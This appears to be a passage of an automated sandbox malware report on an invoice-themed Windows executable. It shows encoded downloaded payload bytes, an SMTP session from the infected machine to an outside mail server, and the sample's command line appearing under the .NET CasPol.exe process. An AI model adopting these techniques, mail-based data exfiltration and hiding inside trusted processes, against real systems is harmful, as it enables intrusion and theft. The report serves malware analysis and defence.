                                              2021-11-29 13:25:46 UTC200INData Raw: 1c 5a fb 09 ef cd 5f 13 e5 dc 70 75 8a 7e 36 f3 08 4c d5 e9 16 1e e0 c3 ed 93 0d 8e 02 c7 1c 80 b2 4d 98 65 01 17 c1 55 da dc 43 41 cb fc 49 35 b6 2c b2 ca f4 3e 8b 8e 6f c8 ea a2 e3 00 79 aa 79 7e 80 eb 1d 29 20 c9 23 ae 9c 19 cd 42 9e ab 00 fa 30 c0 40 0b 7c 8c 63 e2 6e fa 6d 2d 82 69 7e 37 27 d3 39 00 e7 10 3e 68 03 2b 3f b5 33 86 43 73 d1 fa 64 6b 7c a0 c1 9a ba 78 45 b0 68 e5 b1 3d 80 6e 7b 00 20 f8 90 69 5b 1f 55 9b 90 ce 8f 28 73 d8 7c 20 c9 68 05 a3 89 5c e1 e8 0e 8c 82 66 41 de c6 70 19 74 95 81 79 d4 d4 39 18 d8 51 6a 19 d7 e8 18 c1 f6 47 85 9a 88 4b 66 df 5e 1c bb c2 6d 28 33 84 bd 91 e3 8c f4 f5 6c 84 5d ec c9 03 71 9e 89 0f aa 27 88 fc 7b 30 13 5a 42 81 91 59 66 97 a1 c4 5f 48 2c 53 89 dc 30 5e 10 23 dd 4d ad 26 29 f0 88 ae 4d 23 61 8f 58 81
                                              Data Ascii: Z_pu~6LMeUCAI5,>oyy~) #B0@|cnm-i~7'9>h+?3Csdk|xEh=n{ i[U(s| h\fApty9QjGKf^m(3l]q'{0ZBYf_H,S0^#M&)M#aX
                                              2021-11-29 13:25:46 UTC202INData Raw: 21 ca 99 5b c4 57 81 4b 2a 9f c5 03 7c df af 62 f7 e0 fe 03 bb e9 9a 3d 55 e0 d2 d3 13 38 7d 63 0f 2d fb 96 35 34 99 75 c3 37 c2 52 ca 25 9a 0c 62 02 08 f5 b4 ae 3e 0d 29 ba db a0 d0 32 70 cb ab 2f d4 a6 8b 37 e0 48 40 10 14 4d f7 e6 d5 36 1c b8 9b 73 8e 32 cc 0c 7c 6e 0b 97 ec 72 18 06 f9 db 59 72 de d0 34 b9 ec b1 db 7d c1 51 4c 5b 2d 00 ab e2 21 22 fe bd dd dc 2f 4b 89 a5 6f 76 60 69 6e df d9 69 e1 a8 75 a5 aa 81 be af d4 12 8a 8c fc cc 72 55 f2 06 21 0c 51 66 c9 c0 03 77 58 28 b6 ae 16 10 6e af 76 21 91 8f cc 1f 47 09 5c c7 0f 44 67 bb 50 42 82 5d b6 d2 b4 98 a5 a4 7a dd 8e 89 a6 d2 8c e6 10 86 dc b8 26 98 3e bf 72 50 7b 73 a3 55 32 bc 70 8b 58 b6 a1 4f ea f0 00 ae f5 78 99 44 da ca ca 03 7c 5c 44 ef 9a 3b d1 5b c9 20 41 e7 73 e9 da 30 30 6d 7c f8 f1
                                              Data Ascii: ![WK*|b=U8}c-54u7R%b>)2p/7H@M6s2|nrYr4}QL[-!"/Kov`iniurU!QfwX(nv!G\DgPB]z&>rP{sU2pXOxD|\D;[ As00m|
                                              2021-11-29 13:25:46 UTC203INData Raw: 1f 21 f2 21 2e ea 26 23 3d 52 08 3f ae 35 86 24 3a eb e3 47 66 66 a1 b8 de 8c 7e 56 ad 6f ed df 3d 8b 6e 7f 00 31 d5 9e 73 3a 1f 4e 8a 92 c5 9c 6d 5e d5 7c 23 de 60 1a a8 cd 7c e7 ee 28 95 95 61 5b fc be 57 13 73 8f 84 79 db b0 0d 09 de 67 40 1b a4 cc 0f dc d6 41 85 83 87 3f 70 ea 58 2c 99 ce 72 2e 12 99 bf 8c e4 84 9a b6 64 8c 59 d2 e8 12 43 9e 8e 15 80 25 fb cb 66 0a 17 5c 42 80 98 59 72 8b a6 e3 4e 57 6b 6f 9b b2 17 42 1f 35 87 7c ab 26 3d 84 a9 b6 57 39 61 86 33 bd 22 40 47 25 60 50 57 aa 27 0c 40 89 91 ee c9 ab c8 37 c5 d9 ec 3e c5 d2 83 42 b2 46 6e 89 6c c1 51 64 05 bf 0f 79 27 a8 73 32 67 b3 7a 39 28 7e fa e3 ee 29 d8 bf ee 43 6f 86 3b 4f 66 db 62 21 59 e5 13 35 44 e7 98 65 83 57 6b 80 85 11 0b 08 2c 84 98 0c 85 68 5b 7f 1c 0a 75 d1 64 c1 e6 f9 59
                                              Data Ascii: !!.&#=R?5$:Gff~Vo=n1s:Nm^|#`|(a[Wsyg@A?pX,r.dYC%f\BYrNWkoB5|&=W9a3"@G%`PW'@7>BFnlQdy's2gz9(~)Co;Ofb!Y5DeWk,h[udY
                                              2021-11-29 13:25:46 UTC204INData Raw: bf 53 7a ee cb 22 b9 ff 8c ba 4c d2 45 59 5b 27 21 df d5 2a 37 f6 cf 9a fb 32 6d af bb 74 65 76 6f 49 ce d9 0c c2 ac 1b 89 bd 95 97 b2 df 2c 9f 8a ed c8 6d 55 f2 06 21 0c 5e 59 c5 c2 17 6e 3d 3d d3 89 2c 35 48 ab 76 03 93 e2 db 0f 47 33 7e a6 1a 40 7e e4 76 41 f1 6c be a1 bf 99 d3 a6 6d a9 a2 a5 a6 e8 a5 88 10 b1 cd 94 00 80 2d b7 00 06 49 63 bb 62 19 b0 74 a0 43 b2 be 2b db fc 11 86 d6 63 f5 75 e6 ff d6 00 7c 43 44 c6 98 5e c4 48 bd 0a 47 f2 20 d4 c0 36 55 46 10 f1 f3 b5 33 17 ae 26 cc 78 0a de 60 cf d2 35 66 88 04 b0 39 dc e8 f5 04 19 9e 5a be ba 45 88 75 a7 6e dc 75 59 15 ad 98 65 e8 9c 77 3d 40 37 05 02 60 09 ce b5 a0 b7 99 da a9 11 74 40 2f aa 53 fe 6c e9 ab c9 7c 74 48 2d 56 a4 c1 7c 8c 3c df 33 28 6c 70 0b a3 43 a8 2d 71 80 94 14 78 8d bd ab 97 c7
                                              Data Ascii: Sz"LEY['!*72mtevoI,mU!^Yn==,5HvG3~@~vAlm-IcbtC+cu|CD^HG 6UF3&x`5f9ZEunuYew=@7`t@/Sl|tH-V|<3(lpC-qx
                                              2021-11-29 13:25:46 UTC205INData Raw: c5 72 4d 23 9f a1 8c ec 82 9a c5 03 aa 42 e3 cd 03 50 99 92 09 aa 33 88 fb 6d 10 13 4d 46 c1 a2 3c 59 86 fb c5 4e 5d 30 51 8f ae 26 53 02 22 cc 4c b7 21 21 9e a8 d7 59 32 70 bd 3f ab 24 4f 47 35 6c 76 57 ed 0e 0d 54 81 8f ce d7 ce e9 22 c3 d9 ed 37 f5 bd 9d 57 a7 6b 4e 94 60 c3 24 52 15 98 61 59 2e b3 4e 10 7f 8e 66 17 3f 66 ca e5 f6 29 ab d8 d8 4e 43 a1 36 4b 2e ec 46 28 4c c4 1f 36 43 88 91 73 f7 7b 4f 98 ae 17 0f 09 01 86 9a 0f c4 4e 40 73 1a 0e 75 eb 6f e6 f7 f9 5f b4 da 54 ed 3d 31 8f f2 bf e8 59 86 00 4c a0 00 ab 03 d0 62 0d ca 33 ef 73 87 cc b5 f8 12 ee a1 3d 93 a8 d2 4b 6c a9 ef ed cb e6 e7 97 2b e8 aa 58 f6 16 c2 4f f0 4e ed 89 32 91 c7 fe 16 9d fa 5b 8d 5e a8 58 a8 ef fc d7 70 cc 1b 7f d0 54 4c 2a f0 d8 37 05 1a 94 db c4 46 fc 06 99 82 12 d2 35
                                              Data Ascii: rM#BP3mMF<YN]0Q&S"L!!Y2p?$OG5lvWT"7WkN`$RaY.Nf?f)NC6K.F(L6Cs{ON@suo_T=1YLb3s=Kl+XON2[^XpTL*7F5
                                              2021-11-29 13:25:46 UTC207INData Raw: a5 c0 b5 d2 95 b9 27 86 ce 86 1a 80 2f d2 3b 47 69 7f a1 42 27 bc 77 b7 40 a7 cc 02 fe f2 36 9e cb 43 90 52 fc df cd 77 6a 54 30 ff bf 2d c6 48 fc 2e 4a ee 54 90 fe 21 37 43 10 f7 f9 a9 47 54 8f 2e d9 7c 2c e2 7b c5 d6 24 05 af 38 b1 3f d6 f7 db 0a 14 95 5a ab 8f 5a 82 71 b6 0d f0 5d 47 22 ae 8f 08 de 97 77 6d 73 2c 1b 06 60 15 e6 a2 bc ac eb 9f 94 08 7e 59 25 b0 7b e9 70 f2 d9 91 76 7d 78 1d 7b a4 c1 7b 87 3a 9b 31 2e 71 42 3a ae 62 a8 33 64 f2 b2 05 63 af dc 90 b7 c7 3d 80 b8 0a d5 a3 51 b7 a5 bb ea fa 0d e3 ea ba 14 51 1f 0a f3 07 81 ea 26 07 f4 cd 42 17 b1 75 25 fa 2c 46 d8 d7 1e 77 fd d2 99 ab 38 9b 39 e0 1a 9b bb 39 d6 67 13 2f ff 75 d6 fd 41 6c c0 e0 49 26 b6 3e 83 f8 8f 13 84 9f 43 c3 f6 a2 f0 00 7b a1 69 7a 8d eb 17 3d 3d a7 06 cb a8 09 d0 77 98
                                              Data Ascii: '/;GiB'w@6CRwjT0-H.JT!7CGT.|,{$8?ZZq]G"wms,`~Y%{pv}x{{:1.qB:b3dc=QQ&Bu%,Fw899g/uAlI&>C{iz==w
                                              2021-11-29 13:25:46 UTC208INData Raw: 76 1e 10 b9 4b 18 60 b5 64 0b 06 62 c7 8c ff 3e d8 bf f2 37 63 ac 20 52 65 c2 07 17 45 c2 09 30 43 93 86 2e b4 7a 53 9c 85 35 09 03 09 9b 87 1b 85 5c 51 68 28 2e 72 f1 69 d9 f0 f1 4f c6 f8 52 ed 11 26 84 e2 ca cf 44 9a 0e 63 b4 20 be 02 db 7a 3b ba 20 e3 68 b6 fe d1 ce 05 ec b7 36 9a b9 cb 4b 6f be 9c a0 d9 ef e7 a1 1c f6 bc 2d c7 0b bb 28 d7 56 dd a9 31 b3 da fd 6f da cc 56 bd 42 ac 47 f5 bd ce dc 70 ec 1b 7b 99 62 6c 36 fa d6 3f 09 12 86 af fe 50 e1 5c ba 80 4e eb 3d 46 69 9e f2 15 42 6c 37 a4 c9 83 ff 20 f7 f3 ec a6 6b 3a e1 bd 59 f5 5d 94 5d 10 8f c8 6f 73 d7 c2 4e e8 99 ba 2d c9 c9 96 49 76 c9 bb e6 1b 5b 41 61 7d 12 92 9d 35 13 b2 55 c3 31 c6 21 d9 32 97 53 47 06 0f cf a4 bb 3c 09 2b be af 9e b5 17 57 cf b4 36 cf b1 f8 3d c3 63 77 04 00 41 9b cb c4
                                              Data Ascii: vK`db>7c ReE0C.zS5\Qh(.riOR&Dc z; h6Ko-(V1oVBGp{bl6?P\N=FiBl7 k:Y]]osN-Iv[Aa}5U1!2SG<+W6=cwA
                                              2021-11-29 13:25:46 UTC209INData Raw: cc e4 66 bb f9 0d 6b 32 5b 61 69 0d 73 8e e7 d0 d9 f7 c2 fc 5e 16 2a 58 5e 93 88 3e 87 d8 c4 1d 11 3f 7a 16 df ae 1a e9 4f 99 58 4d 05 1c 78 4f 81 c3 58 10 f2 e8 72 72 fa 9d e2 c0 29 d4 85 df 6e a0 ee 7b c6 d7 c8 8e 9a 7f e3 a0 eb 5f 31 79 5d 9c 6c ee 90 37 e0 34 ba 1b 49 b3 10 64 94 7b 45 b2 85 74 3e 91 a7 97 d0 59 ef 67 ab 7b e8 d2 4e ca 0d 67 7f a4 21 be 90 23 2a af 95 35 d2 77 7c c6 8c de fb 20 e9 00 ad 8e c2 87 00 3e d3 1d 3c e8 86 60 cd 84 b5 c4 7f dd e0 6b 24 7b 1f 20 b8 42 a0 25 e2 cf e5 48 ab 03 89 8a a1 ea 2e 7f 70 47 3c b1 46 a6 62 5a 56 32 58 4b d5 da 39 21 53 85 87 a6 df 09 e5 f6 af fb 8c e2 ca 01 8a a3 f8 3e 1f 9a a1 57 3c 24 00 3f 5e a1 18 f1 bc e0 2b 06 b6 13 59 8a 0a 74 c8 dc bd 60 98 dd 01 f4 0f 2e b1 da 33 56 00 f3 f0 13 bd b8 6d 4c a9
                                              Data Ascii: fk2[ais^*X^>?zOXMxOXrr)n{_1y]l74Id{Et>Yg{Ng!#*5w| ><`k${ B%H.pG<FbZV2XK9!S>W<$?^+Yt`.3VmL
                                              2021-11-29 13:25:46 UTC210INData Raw: a3 36 d5 f5 fc 2d ba 95 e8 6d 9b d7 ac 4b 6c e2 2a 94 28 33 77 48 71 08 84 36 d8 9e 3d 4e e3 db ab 12 ea 9b b2 16 04 a7 1b 97 31 1b c5 46 bf 46 72 e9 3e da 85 be 4a 7a dc ec 3d 94 dc e7 13 f5 86 46 6d 2f 4c 4b 69 f8 86 24 92 98 96 eb be 60 9d dd 37 a2 35 ee 26 71 fc a7 0b 3f 90 a9 21 99 e8 b4 60 b1 ad e1 3a 14 8e dc 85 ff 01 3d 0b 2f 69 9c f2 58 62 ed 05 a8 58 a7 58 aa 45 ec 41 45 6b 66 82 82 d2 69 6f 59 d9 d5 e9 a8 43 30 2e 15 51 a9 f8 ea d2 43 32 2e 67 f5 f5 e5 22 61 42 f0 0c fd 96 04 54 d7 78 9c 3a 16 fe 8d 06 46 4d 9f b9 36 15 8c b6 c7 01 8b fc da 3f a2 a9 d9 2a 42 51 d1 98 4a 45 94 be 94 a4 55 11 e9 f4 1a 01 92 f4 3e ab ab 14 88 c5 76 e0 d7 fe 50 40 a5 45 fe ff 91 b5 1a 55 94 61 48 56 18 36 aa bb 6b 13 51 4f d7 d8 51 5a 37 c7 14 49 fe a5 a3 7b 3b 5f
                                              Data Ascii: 6-mKl*(3wHq6=N1FFr>Jz=Fm/LKi$`75&q?!`:=/iXbXXEAEkfioYC0.QC2.g"aBTx:FM6?*BQJEU>vP@EUaHV6kQOQZ7I{;_
                                              2021-11-29 13:25:46 UTC212INData Raw: ac 9f 69 16 8e a3 91 c5 59 ef 67 aa 6d fa d5 47 df 18 6b 5e a8 31 ae 1f 1e 32 aa 9d 3a 57 be 69 ee 85 d8 7b ef e4 18 b1 86 c4 94 11 bf fb 10 3e e6 95 77 45 59 af 4c a8 c8 62 af b6 1b ce 2b 9e 42 b0 b5 3b 1a eb 4c ba 83 7b 18 c6 b9 08 79 75 57 be 5c 4a 8f 63 5f 5c 2a 7d 43 cf 4a e0 2e 74 86 97 33 18 8e 5c f6 a0 e1 05 30 da 17 02 65 6a 71 50 12 78 45 be f3 13 2a 5e a3 b4 fc 80 e8 39 a4 d7 1f 53 ab 18 f5 12 c3 3b 95 88 5c ea 71 ee 2b 99 c7 35 6a 05 db ec 17 a7 31 8b 6a aa 39 05 6c 55 ca 6d b2 a1 24 6c 0c f8 bf d7 92 29 7b c1 a3 13 cf 35 f5 ef f9 85 f6 f1 a6 03 ec 3c 0d 5b 74 a3 0b f5 6e d6 c0 40 ba 94 a3 6f 2f 2f e7 eb 5c 3c f7 dd 92 2b 3b 58 38 ec d2 64 2d 6f 55 a1 22 c1 55 4b ed de c6 be 83 02 e2 77 d7 c5 7e 3c 5d 09 3b 24 af 73 e2 ea f1 63 55 a9 a3 91 44
                                              Data Ascii: iYgmGk^12:Wi{>wEYLb+B;L{yuW\Jc_\*}CJ.t3\0ejqPxE*^9S;\q+5j1j9lUm$l){5<[tn@o//\<+;X8d-oU"UKw~<];$scUD
                                              2021-11-29 13:25:46 UTC213INData Raw: b2 76 ae be 75 34 11 9c 53 bd 70 30 2d 1f 8e 42 8e e2 58 7f e3 0f ba 4a b3 5c b1 58 f6 41 a2 be 63 82 65 07 54 70 5a 55 06 f5 34 06 33 2f f1 4d 39 15 f6 5c a1 be ef 67 1c 32 9e b3 31 79 78 d1 f7 13 dd 46 ac eb fc 06 2b f0 9b 84 a2 4a 82 ad 94 1d 8f b5 c7 f5 83 da fb 3f a1 aa e1 21 46 73 de 8c 58 4c 94 b6 82 a5 47 0b 6e 09 06 0f 0b 01 25 a3 a3 08 80 c4 73 f0 cb ec d0 d3 b5 45 de ff 98 b5 1b 55 94 66 4d 57 1d 37 b4 aa 6d 1d 5d 5a c1 5b d0 46 2c 4f 44 4e f2 81 b9 13 3f 56 0e b3 6f a4 93 ba 20 ae c2 30 d5 c0 d7 f2 b0 d1 9e 30 d0 d2 53 f7 fd e8 6d f1 c1 ef 72 e2 52 d2 71 1b 14 08 c1 30 f7 20 2a c5 3d c6 de ce 14 94 66 70 f3 04 e7 a0 10 b2 b7 62 0b b0 dd a1 f8 df e3 34 b3 54 2a 8e 32 10 09 56 3c 08 72 90 8e 46 73 46 b5 4b b0 02 67 a2 15 ae ad 42 84 65 40 d0 ca
                                              Data Ascii: vu4Sp0-BXJ\XAceTpZU43/M9\g21yxF+J?!FsXLGn%sEUfMW7m]Z[F,ODN?Vo 00SmrRq0 *=fpb4T*2V<rFsFKgBe@
                                              2021-11-29 13:25:46 UTC214INData Raw: 9b 28 18 8e 85 ea a0 f4 02 39 d7 0e 9f bf 65 f0 05 07 7e 4d 93 f6 05 2f 5e a0 70 f8 b2 69 68 28 b8 0c 41 2b 90 74 d4 4c 7d 9b 87 53 f6 ed 01 27 b7 db 3a 6b 0d f3 e5 1e bd a2 eb 2c b8 51 0c 76 ca ac 75 bd a2 15 ed e4 e7 0a 04 94 39 61 5c 32 00 5f e1 b0 da ea 0c 72 f5 a4 82 a9 23 9f d6 7b 21 f7 f5 68 d9 43 95 ab 1c 6d 6f 26 36 e1 e4 d8 61 fc dd 9f 28 39 57 54 e6 c1 6d 23 7c 58 a1 3b e4 48 53 f3 dd d7 3d 4b 0a ec 6a c2 47 21 3a 43 8b 3a 31 b5 65 6e 23 f2 62 18 a6 b9 1a 03 a2 a2 03 c0 87 af 6f 72 db 3a 09 f4 0d a1 59 24 f1 91 1d 77 4a db 2c 73 1d cf 07 f1 64 34 b9 82 8c 55 59 41 8a 25 b1 95 41 42 0e ba 3b c5 b9 a0 6e c3 6a e9 ed 81 b7 06 24 ef e4 4b ec c0 6a e5 fa 70 07 32 36 12 79 7a 10 00 bd b6 9c 93 3e c8 b7 3a 9e 5e 50 fd 9d a3 a7 25 fc 75 3f db 5b de 6f
                                              Data Ascii: (9e~M/^pih(A+tL}S':k,Qvu9a\2_r#{!hCmo&6a(9WTm#|X;HS=KjG!:C:1en#bor:Y$wJ,sd4UYA%AB;nj$Kjp26yz>:^P%u?[o
                                              2021-11-29 13:25:46 UTC216INData Raw: 12 71 52 10 dc 8e be 5f 0c fe 55 83 12 01 9c 7d a5 be 1e 01 5c 74 fa 4e ac d9 f7 aa 51 eb ec 18 34 1e 47 14 23 5b 46 0f b7 31 b3 70 9b 18 52 d6 c8 c9 e7 23 cb 16 29 f2 81 a3 74 21 d7 4c b4 fc 35 04 a6 37 27 a8 39 cb c7 c2 74 3c c2 0d 28 91 ce cf b2 f4 f4 e2 7a a9 f5 ee ac 49 52 d2 1b 1f 14 a6 2f 7b d1 0a d0 ad 93 de ce 9d 9b 69 f4 bb 18 f2 25 94 b6 a4 72 04 34 4c a7 ea 5f be 3f af c9 fa b3 27 82 a7 51 47 81 e5 9f 8e 46 73 41 ce c2 34 0d 7d 0f 52 b2 38 c1 17 7c d0 cc 59 33 0b e9 49 7b e9 ba 8c e2 2a f5 9f 53 05 b5 22 ab f6 df f6 78 a7 e4 01 6a 12 59 72 75 83 ec 85 c1 f2 d8 f6 c8 7a ef 32 2c 45 cb 04 0d 87 87 cb 48 5b 04 2e f3 81 d0 be 9f a9 40 86 58 45 0b 13 64 dd 91 8d 53 1e e0 9c 7d 14 f7 a0 ec f6 ae 44 95 cd ee 38 fd 00 43 97 dc 9d 15 e0 e2 b1 6b 11 31
                                              Data Ascii: qR_U}\tNQ4G#[F1pR#)t!L57'9t<(zIR/{i%r4L_?'QGFsA4}R8|Y3I{*S"xjYruz2,EH[.@XEdS}D8Ck1
                                              2021-11-29 13:25:46 UTC217INData Raw: f7 e6 63 cc 47 a8 a9 09 66 7a 35 2e e9 d6 58 33 70 88 99 2f 3c 57 bd 0b d8 65 39 f2 90 ad 39 d6 c9 3f f4 dd c5 bf b6 01 e4 6b d7 c7 eb 34 56 0b 2d b9 4f 6a 67 16 e0 f1 01 42 ad 9c 41 a5 31 f3 51 8e 9d ef 20 52 45 15 7b 72 a9 71 37 72 c3 8e 6f 44 db 2e 63 93 01 1e 77 6d 07 ac 0c 59 41 f8 d9 8a 25 b0 15 55 21 01 b2 3b c4 e8 a7 5c 41 2b e9 f7 08 ff 28 2f ed ff 52 60 7f 60 ef e9 70 07 66 33 3c 75 6e 13 00 51 bc 94 bd 37 c7 ad b4 30 51 7e e1 93 3c 12 24 d4 6b 30 45 ce c9 ed 18 0a 4a 9a 45 87 01 fb 3f 7d a2 72 8e c5 57 5d 39 ae 02 02 d5 1d 0c be 01 0e d2 6b 8a c7 23 88 78 c7 20 9b 28 33 2b 58 e2 37 d8 04 b3 8e af 2e 3e d5 36 c7 e7 b3 92 06 8d 6b 1b a6 b2 a4 69 94 ad 46 72 e9 7e da 99 31 81 7c e1 e1 3e 88 54 3c 13 e7 92 e7 f1 26 50 c2 a0 ff 8e 2e 8d 95 90 e4 31
                                              Data Ascii: cGfz5.X3p/<We99?k4V-OjgBA1Q RE{rq7roD.cwmYA%U!;\A+(/R``pf3<unQ70Q~<$k0EJE?}rW]9k#x (3+X7.>6kiFr~1|>T<&P.1
                                              2021-11-29 13:25:46 UTC218INData Raw: cd 33 f6 04 0d c8 26 cf cb 45 87 9f 77 d1 b3 18 f6 01 89 b4 bd 71 08 b1 ac a2 ea 5e a1 32 bd c9 9d e8 20 e4 a9 30 55 70 7c ed 9c fd 33 7b dc 6c ad 7b 6f f9 12 d7 b8 7e 05 88 41 aa 4b d6 9a 9a 47 1b fb 52 cc 85 37 89 1f b0 0d c7 30 5e 67 b6 ea 00 bb 8b 03 43 32 3b 6f 08 03 10 8b e8 d2 bc eb b3 fa 0d 17 5f 4a f0 16 f8 1e e9 d9 bb 1b 61 3c 00 18 be ac 74 e9 2b 9b 35 4b 71 1d 44 cf 7f cd 2f 10 95 f5 4f 17 8b bd 8d d2 db 49 e2 df 1d a1 93 12 b5 d7 ba 8f f1 79 91 a3 c5 51 06 7b 74 9c 5b ef b0 26 53 91 96 1d 2f de 79 44 e4 69 05 bc f0 71 77 93 c8 99 ff 5d dd 66 8e 75 de d5 63 d6 34 76 75 a0 12 bf b0 2a 19 af bb 27 28 b6 10 e6 fc cc 73 e2 e8 1d a9 9f c4 8a 08 3a ef 0c 39 e6 80 75 4e 5b c2 4c b3 dd 05 b7 31 fe ce 32 a2 50 c8 2a 7e 01 ec 45 a5 11 18 ef 4a fe 67 6c
                                              Data Ascii: 3&Ewq^2 0Up|3{l{o~AKGR70^gC2;o_Ja<t+5KqD/OIyQ{t[&S/yDiqw]fuc4vu*'(s:9uN[L12P*~EJgl
                                              2021-11-29 13:25:46 UTC219INData Raw: 99 b6 30 c7 d3 86 12 c6 21 4a 2e b3 fd 4a 37 e2 e2 05 e5 89 6a f1 f4 48 ef 79 75 ee fd 0b 8d 26 3a 14 66 68 08 9e 02 a9 97 80 33 da ad 5e 84 48 43 fd 9c bd b3 2d f7 67 2c da 56 c6 6a b7 11 45 b4 5a 83 00 fb d6 a8 b6 6a 95 d9 47 d5 d8 a5 2c 1e c2 81 e8 b1 86 9c cf 6b 87 c0 30 83 79 d0 41 88 26 af d6 47 f2 bf 8d 15 c7 9a 32 cb 2b cc 37 de eb bd a3 85 99 72 e1 48 ce f6 40 9a b7 53 60 6c ed db 97 3f 8b 79 fc ef 3c 82 50 32 1d fb 84 60 7d af 7e ce cc f1 86 20 94 86 bf f9 3f 50 92 df 37 a7 37 e5 2e 7d ed b4 06 36 aa a7 28 ba e3 bb 73 be b1 f2 20 16 8a d5 91 7c 3a 37 0c 07 60 87 e8 d1 23 ee 14 a6 45 ae 41 af 47 e9 50 2e 72 fb 70 ef dd 4c 6a 46 c6 5b 07 bb 42 24 bf 59 0f bd c8 fb 5c bb 34 3a 76 72 21 ff ab b0 52 71 cb 6d 13 cc c2 a7 61 1c 03 03 f0 89 06 47 43 89
                                              Data Ascii: 0!J.J7jHyu&:fh3^HC-g,VjEZjG,k0yA&G2+7rH@S`l?y<P2`}~ ?P77.}6(s |:7`#EAGP.rpLjF[B$Y\4:vr!RqmaGC
                                              2021-11-29 13:25:46 UTC221INData Raw: bf fa 0c 17 58 4a b7 16 e3 1e e8 d9 c9 1b 11 3c 42 18 ff ac 2e e9 60 9b 66 4b 2b 1d 5a cf 10 cd 3d 10 ed f5 61 17 b6 bd 8c d2 dd 49 e5 df 1d a1 92 12 a3 d7 a5 8f da 79 82 a3 87 51 5a 7b 5a 9c 3d ef ef 26 28 91 c3 1d 02 de 67 44 cf 69 6b bc eb 71 68 93 cb 99 a9 5d 88 66 e1 75 bf d5 22 d6 6b 76 19 a0 44 bf f5 2a 4b af f6 27 2a b6 3f e6 f6 cc 09 e5 c3 00 c9 83 b4 84 65 3e cf 0d 3b ee a0 72 4f 49 a6 44 e2 cf 05 be 51 fb a7 2e d2 42 e2 37 0d 12 9b 4d d2 03 e9 0a 2d ec 69 7e 19 55 c8 54 42 86 43 5b 5e 37 10 4b d8 5a e9 24 3c 85 e7 26 63 0f a2 f7 c7 e9 62 37 b8 06 ee b1 3e f3 64 1a 1c 45 d9 f1 73 3a 2d 21 84 f9 c5 e8 28 26 e5 19 22 aa 41 75 bc cd 64 95 f8 5d a1 f0 4c 2f d5 c6 42 76 6e fb 88 16 d2 b0 28 6c fb 38 6b 7e bc af 3f b5 c3 35 87 ec 8d 3f 60 8f 54 73 9b
                                              Data Ascii: XJ<B.`fK+Z=aIyQZ{Z=&(gDikqh]fu"kvD*K'*?e>;rOIDQ.B7M-i~UTBC[^7KZ$<&cb7>dEs:-!(&"Aud]L/Bvn(l8k~?5?`Ts
                                              2021-11-29 13:25:46 UTC222INData Raw: 3a b2 ca 5a f0 b5 8d 16 da 9f 2f ce 36 c9 2a db ef bb b2 04 85 76 1e b7 31 09 44 93 b7 53 60 68 e7 db 97 3f 8f 72 fc ef 3c 86 5c 32 1d fb 80 66 6c 2e 5e ca a8 f1 86 20 90 96 98 f9 3f 55 95 dc 35 a5 35 ed 2e 79 ec a9 03 3e b2 af 21 9a e0 ba 6e bb ac f7 3d 13 8d d2 94 7e 38 35 0e 0f 6b 92 fa 50 67 ed 07 a6 56 af 52 ad 40 ee 53 20 63 7b 90 e7 da 4c 68 48 d7 db e7 b5 46 22 ae d8 5f bb c8 f8 52 b3 3c 32 75 75 20 f7 a2 b0 50 70 d9 ef 16 dd 46 be 69 1d 03 0b f0 89 06 47 43 97 bf 16 14 8d a4 46 dc 8d dc db 3e b3 28 3c 2f 42 53 df 90 44 43 93 bd 9a b9 5b 19 ec d4 1a 13 13 1d 3d ab ab 0c 80 c5 75 e8 cf ec d1 dd ad 41 fe fe 99 ad 1f 55 95 63 55 53 1d 36 a8 b2 62 1a 58 4f d3 da 49 47 3e ce 04 40 fc 8f ab 7a 33 56 0c a6 7d 25 0a bb 32 2f 82 3e db d2 d0 f5 a5 c3 1f a9
                                              Data Ascii: :Z/6*v1DS`h?r<\2fl.^ ?U55.y>!n=~85kPgVR@S c{LhHF"_R<2uu PpFiGCF>(</BSDC[=uAUcUS6bXOIG>@z3V}%2/>


                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Nov 29, 2021 14:27:21.664874077 CET58749801116.202.203.61192.168.11.20220-server.infomedya.net ESMTP Exim 4.94.2 #2 Mon, 29 Nov 2021 16:27:21 +0300
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Nov 29, 2021 14:27:21.665445089 CET49801587192.168.11.20116.202.203.61EHLO 035347
                                              Nov 29, 2021 14:27:21.678915977 CET58749801116.202.203.61192.168.11.20250-server.infomedya.net Hello 035347 [102.129.143.99]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPE_CONNECT
                                              250-STARTTLS
                                              250 HELP
                                              Nov 29, 2021 14:27:21.679320097 CET49801587192.168.11.20116.202.203.61STARTTLS
                                              Nov 29, 2021 14:27:21.696911097 CET58749801116.202.203.61192.168.11.20220 TLS go ahead

                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:14:25:14
                                              Start date:29/11/2021
                                              Path:C:\Users\user\Desktop\FAKTURA 9502461485.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\FAKTURA 9502461485.exe"
                                              Imagebase:0x400000
                                              File size:155648 bytes
                                              MD5 hash:34AE2E779E3B63F6450AACBAA6B5AB1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Visual Basic
                                              Reputation:low

                                              General

                                              Start time:14:25:15
                                              Start date:29/11/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7bd840000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:14:25:29
                                              Start date:29/11/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\FAKTURA 9502461485.exe"
                                              Imagebase:0x2c0000
                                              File size:108664 bytes
                                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:14:25:29
                                              Start date:29/11/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\FAKTURA 9502461485.exe"
                                              Imagebase:0x830000
                                              File size:108664 bytes
